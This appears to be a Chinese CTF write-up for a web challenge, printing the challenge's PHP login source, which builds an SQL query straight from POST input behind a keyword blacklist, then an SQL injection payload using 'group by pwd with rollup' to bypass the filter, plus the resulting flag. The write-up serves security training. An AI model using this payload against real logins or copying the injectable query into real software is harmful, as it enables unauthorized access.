CTF题库>因缺思汀的绕过

谁借莪１个温暖的怀抱￠ 2021-10-24 01:36 316阅读 0赞

访问解题链接去访问题目,可以进行答题。根据web题一般解题思路去解答此题。看源码，请求，响应等。提交与题目要求一致的内容即可返回flag。然后提交正确的flag即可得分。web题主要考察SQL注入，XSS等相关知识。涉及方向较多。此题主要涉及源码审计，MySQL相关的知识。

flag格式 CTF\{\}

我们访问网站之后 出现这个

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyNzc3ODA0_size_16_color_FFFFFF_t_70][]

我们要先进行查看源码

![20190819170129619.png][]

发现了 source.txt

访问他之后可以得到

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyNzc3ODA0_size_16_color_FFFFFF_t_70 1][]

<?php
    error_reporting(0);
    
    if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {
    	echo '<form action="" method="post">'."<br/>";
    	echo '<input name="uname" type="text"/>'."<br/>";
    	echo '<input name="pwd" type="text"/>'."<br/>";
    	echo '<input type="submit" />'."<br/>";
    	echo '</form>'."<br/>";
    	echo ''."<br/>";
        die;
    }
    
    function AttackFilter($StrKey,$StrValue,$ArrReq){  
        if (is_array($StrValue)){
            $StrValue=implode($StrValue);
        }
        if (preg_match("/".$ArrReq."/is",$StrValue)==1){   
            print "姘村彲杞借垷锛屼害鍙禌鑹囷紒";
            exit();
        }
    }
    
    $filter = "and|select|from|where|union|join|sleep|benchmark|,|$|$";
    foreach($_POST as $key=>$value){ 
        AttackFilter($key,$value,$filter);
    }
    
    $con = mysql_connect("XXXXXX","XXXXXX","XXXXXX");
    if (!$con){
    	die('Could not connect: ' . mysql_error());
    }
    $db="XXXXXX";
    mysql_select_db($db, $con);
    $sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";
    $query = mysql_query($sql); 
    if (mysql_num_rows($query) == 1) { 
        $key = mysql_fetch_array($query);
        if($key['pwd'] == $_POST['pwd']) {
            print "CTF{XXXXXX}";
        }else{
            print "浜﹀彲璧涜墖锛�";
        }
    }else{
    	print "涓€棰楄禌鑹囷紒";
    }
    mysql_close($con);
    ?>

![20190819170304361.png][]

它把我们经常使用的注入语句 用的函数 都给过滤乐

![20190819170542296.png][]

意思是将uname作为条件输入，然后通过提交的uname去数据库中查询uname和pwd，然后把查询到的pwd和用户输入的pwd再进行对比   如果用户输入的pwd和数据库中查询的pwd相同的话，输出CTF\{XXXXXX\}

构造语句

' or 1=1 group by pwd with rollup limit 1 offset 2 #

SELECT \* FROM interest where uname=' ' or 1=1   
group by pwd with rollup  （在数据库中添加一行使得pwd=NULL）  
limit 1 （只查询一行）  
offset 2  （从第二行开始查询）  
\#注释  
此时密码只要为空即可查询成功

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyNzc3ODA0_size_16_color_FFFFFF_t_70 2][]

得到

![201908191707314.png][]

CTF\{with\_rollup\_interesting\}

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyNzc3ODA0_size_16_color_FFFFFF_t_70]: /images/20211023/0ef4a806ce60427db8836692a721c517.png
[20190819170129619.png]: /images/20211023/c3c9a100252c4fcf87c954b5787a4b95.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyNzc3ODA0_size_16_color_FFFFFF_t_70 1]: /images/20211023/fefa7afb6cfd46a2b6716b1b2cbd43d9.png
[20190819170304361.png]: /images/20211023/4187020390b646de93362eb08decc0cd.png
[20190819170542296.png]: /images/20211023/007d565998594d7b9c68b5c9fbd7cf7f.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyNzc3ODA0_size_16_color_FFFFFF_t_70 2]: /images/20211023/24eb815ca4a3406bba4a5672df2d5827.png
[201908191707314.png]: /images/20211023/9e5977db915f48e68471be708527702a.png